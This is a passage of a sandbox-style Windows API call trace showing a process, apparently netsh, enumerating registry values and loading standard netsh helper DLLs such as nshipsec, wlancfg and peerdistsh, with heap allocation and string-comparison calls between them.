hKey=0x90, dwIndex=0xa, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="hnetmon", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.043] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0174.043] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0174.043] GetProcessHeap () returned 0x2d0000 [0174.043] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1e0) returned 0x308af0 [0174.043] GetProcessHeap () returned 0x2d0000 [0174.043] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x310380 [0174.043] GetProcessHeap () returned 0x2d0000 [0174.043] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3103a0 [0174.043] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0174.043] GetProcessHeap () returned 0x2d0000 [0174.043] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310fd0 | out: hHeap=0x2d0000) returned 1 [0174.043] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef3f60000 [0174.050] GetProcAddress (hModule=0x7fef3f60000, lpProcName="InitHelperDll") returned 0x7fef3f622a4 [0174.050] InitHelperDll () returned 0x0 [0174.050] RegisterHelper () returned 0x0 [0174.050] GetProcessHeap () returned 0x2d0000 [0174.050] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x9f8) returned 0x314dc0 [0174.051] GetProcessHeap () returned 0x2d0000 [0174.051] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x313c10 | out: hHeap=0x2d0000) returned 1 [0174.051] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="rpc", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.051] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0174.051] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0174.051] GetProcessHeap () returned 0x2d0000 [0174.051] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x208) returned 0x308ce0 [0174.051] GetProcessHeap () returned 0x2d0000 [0174.051] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x311300 [0174.051] GetProcessHeap () returned 0x2d0000 [0174.051] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x310420 [0174.051] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0174.051] GetProcessHeap () returned 0x2d0000 [0174.051] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308af0 | out: hHeap=0x2d0000) returned 1 [0174.051] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef3f50000 [0174.052] GetProcAddress (hModule=0x7fef3f50000, lpProcName="InitHelperDll") returned 0x7fef3f52e88 [0174.052] InitHelperDll () returned 0x0 [0174.052] RegisterHelper () returned 0x0 [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa50) returned 0x3157c0 [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314dc0 | out: hHeap=0x2d0000) returned 1 [0174.053] RegisterHelper () returned 0x0 [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xaa8) returned 0x316220 [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3157c0 | out: hHeap=0x2d0000) returned 1 [0174.053] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="dot3cfg", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.053] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0174.053] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x230) returned 0x316cd0 [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x310440 [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x310460 [0174.053] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0174.053] GetProcessHeap () returned 0x2d0000 [0174.053] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x308ce0 | out: hHeap=0x2d0000) returned 1 [0174.053] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef3f30000 [0174.064] GetProcAddress (hModule=0x7fef3f30000, lpProcName="InitHelperDll") returned 0x7fef3f3390c [0174.064] InitHelperDll () returned 0x0 [0174.064] RegisterHelper () returned 0x0 [0174.064] GetProcessHeap () returned 0x2d0000 [0174.064] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb00) returned 0x316f10 [0174.064] GetProcessHeap () returned 0x2d0000 [0174.064] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316220 | out: hHeap=0x2d0000) returned 1 [0174.064] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="napmontr", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.064] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0174.064] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0174.064] GetProcessHeap () returned 0x2d0000 [0174.064] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x258) returned 0x317a20 [0174.064] GetProcessHeap () returned 0x2d0000 [0174.064] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x310500 [0174.064] GetProcessHeap () returned 0x2d0000 [0174.064] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x308f40 [0174.064] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0174.064] GetProcessHeap () returned 0x2d0000 [0174.064] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316cd0 | out: hHeap=0x2d0000) returned 1 [0174.064] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef3ba0000 [0174.126] GetProcAddress (hModule=0x7fef3ba0000, lpProcName="InitHelperDll") returned 0x7fef3bb048c [0174.126] InitHelperDll () returned 0x0 [0174.126] RegisterHelper () returned 0x0 [0174.126] GetProcessHeap () returned 0x2d0000 [0174.126] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb58) returned 0x3161d0 [0174.126] GetProcessHeap () returned 0x2d0000 [0174.126] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316f10 | out: hHeap=0x2d0000) returned 1 [0174.126] RegisterHelper () returned 0x0 [0174.126] GetProcessHeap () returned 0x2d0000 [0174.126] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xbb0) returned 0x316d30 [0174.126] GetProcessHeap () returned 0x2d0000 [0174.126] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3161d0 | out: hHeap=0x2d0000) returned 1 [0174.126] RegisterHelper () returned 0x0 [0174.126] GetProcessHeap () returned 0x2d0000 [0174.126] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc08) returned 0x317f60 [0174.127] GetProcessHeap () returned 0x2d0000 [0174.127] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316d30 | out: hHeap=0x2d0000) returned 1 [0174.127] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="nshipsec", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0174.127] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0174.127] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0174.127] GetProcessHeap () returned 0x2d0000 [0174.127] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x280) returned 0x318b70 [0174.127] GetProcessHeap () returned 0x2d0000 [0174.127] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x3105c0 [0174.127] GetProcessHeap () returned 0x2d0000 [0174.127] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x314030 [0174.127] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0174.127] GetProcessHeap () returned 0x2d0000 [0174.127] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x317a20 | out: hHeap=0x2d0000) returned 1 [0174.127] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef3aa0000 [0174.154] GetProcAddress (hModule=0x7fef3aa0000, lpProcName="InitHelperDll") returned 0x7fef3aa6230 [0174.154] InitHelperDll () returned 0x0 [0174.154] RegisterHelper () returned 0x0 [0174.154] GetProcessHeap () returned 0x2d0000 [0174.154] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc60) returned 0x31be00 [0174.154] GetProcessHeap () returned 0x2d0000 [0174.154] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x317f60 | out: hHeap=0x2d0000) returned 1 [0174.154] RegisterHelper () returned 0x0 [0174.154] GetProcessHeap () returned 0x2d0000 [0174.154] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xcb8) returned 0x31ca70 [0174.154] GetProcessHeap () returned 0x2d0000 [0174.154] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31be00 | out: hHeap=0x2d0000) returned 1 [0174.154] RegisterHelper () returned 0x0 [0174.154] GetProcessHeap () returned 0x2d0000 [0174.154] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xd10) returned 0x31d730 [0174.155] GetProcessHeap () returned 0x2d0000 [0174.155] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ca70 | out: hHeap=0x2d0000) returned 1 [0175.212] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="nettrace", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0175.212] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0175.212] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0175.212] GetProcessHeap () returned 0x2d0000 [0175.212] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2a8) returned 0x317f60 [0175.212] GetProcessHeap () returned 0x2d0000 [0175.212] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x3107a0 [0175.212] GetProcessHeap () returned 0x2d0000 [0175.212] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x317560 [0175.212] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0175.212] GetProcessHeap () returned 0x2d0000 [0175.212] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x318b70 | out: hHeap=0x2d0000) returned 1 [0175.212] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef3900000 [0175.663] GetProcAddress (hModule=0x7fef3900000, lpProcName="InitHelperDll") returned 0x7fef3947360 [0175.665] InitHelperDll () returned 0x0 [0175.665] RegisterHelper () returned 0x0 [0175.665] GetProcessHeap () returned 0x2d0000 [0175.665] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xd68) returned 0x322600 [0175.665] GetProcessHeap () returned 0x2d0000 [0175.665] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31d730 | out: hHeap=0x2d0000) returned 1 [0175.665] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="WcnNetsh", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0175.666] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0175.666] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0175.666] GetProcessHeap () returned 0x2d0000 [0175.666] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2d0) returned 0x323370 [0175.666] GetProcessHeap () returned 0x2d0000 [0175.666] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x3106a0 [0175.666] GetProcessHeap () returned 0x2d0000 [0175.666] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x322550 [0175.666] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0175.666] GetProcessHeap () returned 0x2d0000 [0175.666] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x317f60 | out: hHeap=0x2d0000) returned 1 [0175.666] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef38b0000 [0175.673] GetProcAddress (hModule=0x7fef38b0000, lpProcName="InitHelperDll") returned 0x7fef38b28e4 [0175.673] InitHelperDll () returned 0x0 [0175.673] RegisterHelper () returned 0x0 [0175.673] GetProcessHeap () returned 0x2d0000 [0175.674] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xdc0) returned 0x323e50 [0175.674] GetProcessHeap () returned 0x2d0000 [0175.674] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x322600 | out: hHeap=0x2d0000) returned 1 [0175.674] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="p2pnetsh", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0175.674] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0175.674] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0175.674] GetProcessHeap () returned 0x2d0000 [0175.674] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2f8) returned 0x317f60 [0175.674] GetProcessHeap () returned 0x2d0000 [0175.674] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x3106c0 [0175.674] GetProcessHeap () returned 0x2d0000 [0175.674] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x323980 [0175.674] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0175.674] GetProcessHeap () returned 0x2d0000 [0175.674] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x323370 | out: hHeap=0x2d0000) returned 1 [0175.674] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef3880000 [0175.684] GetProcAddress (hModule=0x7fef3880000, lpProcName="InitHelperDll") returned 0x7fef3885568 [0175.684] InitHelperDll () returned 0x0 [0175.684] RegisterHelper () returned 0x0 [0175.684] GetProcessHeap () returned 0x2d0000 [0175.684] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe18) returned 0x32ae40 [0175.684] GetProcessHeap () returned 0x2d0000 [0175.684] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x323e50 | out: hHeap=0x2d0000) returned 1 [0175.684] RegisterHelper () returned 0x0 [0175.684] GetProcessHeap () returned 0x2d0000 [0175.684] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe70) returned 0x32bc60 [0175.684] GetProcessHeap () returned 0x2d0000 [0175.684] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae40 | out: hHeap=0x2d0000) returned 1 [0175.685] RegisterHelper () returned 0x0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xec8) returned 0x32cae0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32bc60 | out: hHeap=0x2d0000) returned 1 [0175.685] RegisterHelper () returned 0x0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xf20) returned 0x32ae40 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32cae0 | out: hHeap=0x2d0000) returned 1 [0175.685] RegisterHelper () returned 0x0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xf78) returned 0x32bd70 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae40 | out: hHeap=0x2d0000) returned 1 [0175.685] RegisterHelper () returned 0x0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xfd0) returned 0x32ccf0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32bd70 | out: hHeap=0x2d0000) returned 1 [0175.685] RegisterHelper () returned 0x0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1028) returned 0x32ae40 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ccf0 | out: hHeap=0x2d0000) returned 1 [0175.685] RegisterHelper () returned 0x0 [0175.685] GetProcessHeap () returned 0x2d0000 [0175.685] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1080) returned 0x32be70 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae40 | out: hHeap=0x2d0000) returned 1 [0175.686] RegisterHelper () returned 0x0 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10d8) returned 0x32cf00 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32be70 | out: hHeap=0x2d0000) returned 1 [0175.686] RegisterHelper () returned 0x0 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1130) returned 0x32dfe0 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32cf00 | out: hHeap=0x2d0000) returned 1 [0175.686] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="wwancfg", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0175.686] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0175.686] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x320) returned 0x31da60 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x310720 [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x310700 [0175.686] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0175.686] GetProcessHeap () returned 0x2d0000 [0175.686] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x317f60 | out: hHeap=0x2d0000) returned 1 [0175.686] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef3780000 [0175.690] GetProcAddress (hModule=0x7fef3780000, lpProcName="InitHelperDll") returned 0x7fef37820c8 [0175.690] InitHelperDll () returned 0x0 [0175.690] RegisterHelper () returned 0x0 [0175.690] GetProcessHeap () returned 0x2d0000 [0175.690] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1188) returned 0x32ae40 [0175.690] GetProcessHeap () returned 0x2d0000 [0175.690] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32dfe0 | out: hHeap=0x2d0000) returned 1 [0175.690] RegEnumValueW (in: hKey=0x90, dwIndex=0x13, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="wlancfg", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0175.690] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0175.690] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0175.690] GetProcessHeap () returned 0x2d0000 [0175.690] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x348) returned 0x323e50 [0175.690] GetProcessHeap () returned 0x2d0000 [0175.690] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x31ce80 [0175.690] GetProcessHeap () returned 0x2d0000 [0175.690] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x31cec0 [0175.690] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0175.690] GetProcessHeap () returned 0x2d0000 [0175.690] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31da60 | out: hHeap=0x2d0000) returned 1 [0175.690] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef3620000 [0175.693] GetProcAddress (hModule=0x7fef3620000, lpProcName="InitHelperDll") returned 0x7fef362613c [0175.694] InitHelperDll () returned 0x0 [0175.694] RegisterHelper () returned 0x0 [0175.694] GetProcessHeap () returned 0x2d0000 [0175.694] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x11e0) returned 0x32cfd0 [0175.694] GetProcessHeap () returned 0x2d0000 [0175.694] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae40 | out: hHeap=0x2d0000) returned 1 [0175.694] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x2f4260, lpcchValueName=0x1e7a00, lpReserved=0x0, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48 | out: lpValueName="peerdistsh", lpcchValueName=0x1e7a00, lpType=0x0, lpData=0x2ee0a0, lpcbData=0x1e7a48) returned 0x0 [0175.694] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0175.694] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0175.694] GetProcessHeap () returned 0x2d0000 [0175.694] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x370) returned 0x3241a0 [0175.694] GetProcessHeap () returned 0x2d0000 [0175.694] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x31cee0 [0175.694] GetProcessHeap () returned 0x2d0000 [0175.694] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1e) returned 0x325800 [0175.694] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0175.694] GetProcessHeap () returned 0x2d0000 [0175.694] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x323e50 | out: hHeap=0x2d0000) returned 1 [0175.694] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef3530000 [0175.696] GetProcAddress (hModule=0x7fef3530000, lpProcName="InitHelperDll") returned 0x7fef35ae69c [0175.696] InitHelperDll () returned 0x0 [0175.696] RegisterHelper () returned 0x0 [0175.696] GetProcessHeap () returned 0x2d0000 [0175.696] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1238) returned 0x32e1c0 [0175.696] GetProcessHeap () returned 0x2d0000 [0175.696] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32cfd0 | out: hHeap=0x2d0000) returned 1 [0175.696] RegisterHelper () returned 0x0 [0175.696] GetProcessHeap () returned 0x2d0000 [0175.696] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1290) returned 0x32f400 [0175.697] GetProcessHeap () returned 0x2d0000 [0175.697] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32e1c0 | out: hHeap=0x2d0000) returned 1 [0175.697] RegCloseKey (hKey=0x90) returned 0x0 [0175.697] GetProcessHeap () returned 0x2d0000 [0175.697] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4260 | out: hHeap=0x2d0000) returned 1 [0175.697] GetProcessHeap () returned 0x2d0000 [0175.697] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee0a0 | out: hHeap=0x2d0000) returned 1 [0175.698] GetProcessHeap () returned 0x2d0000 [0175.698] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fdf10 [0175.698] GetProcessHeap () returned 0x2d0000 [0175.698] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0175.698] RegisterContext () returned 0x0 [0175.700] GetProcessHeap () returned 0x2d0000 [0175.700] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fdf90 [0175.700] GetProcessHeap () returned 0x2d0000 [0175.700] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0175.761] RegisterContext () returned 0x0 [0175.762] GetProcessHeap () returned 0x2d0000 [0175.762] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe010 [0175.762] GetProcessHeap () returned 0x2d0000 [0175.762] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0175.762] RegisterContext () returned 0x0 [0175.763] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0175.763] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0175.763] GetProcessHeap () returned 0x2d0000 [0175.763] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a5a0 [0175.763] GetProcessHeap () returned 0x2d0000 [0175.763] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fe010 | out: hHeap=0x2d0000) returned 1 [0175.763] RegisterContext () returned 0x0 [0175.764] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0175.764] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0175.764] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0175.764] GetProcessHeap () returned 0x2d0000 [0175.764] RtlAllocateHeap (HeapHandle=0x2d0000, 